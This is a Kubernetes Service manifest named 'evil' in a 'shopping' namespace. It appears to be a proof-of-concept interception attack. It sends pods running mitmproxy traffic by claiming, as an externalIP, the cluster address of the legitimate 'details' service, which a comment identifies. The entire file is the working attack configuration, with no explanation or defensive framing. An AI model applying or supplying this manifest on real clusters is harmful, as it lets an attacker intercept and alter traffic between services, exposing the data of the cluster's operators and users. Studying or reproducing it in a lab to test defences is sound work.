apiVersion: v1
kind: Service
metadata:
  name: evil
  namespace: shopping
spec:
  selector:
    app: mitmproxy
  ports:
  - protocol: TCP
    port: 9080
    targetPort: 8080
    name: mitmproxy
  externalIPs:
  - 10.96.161.180 # http://details.shopping.svc.cluster.local
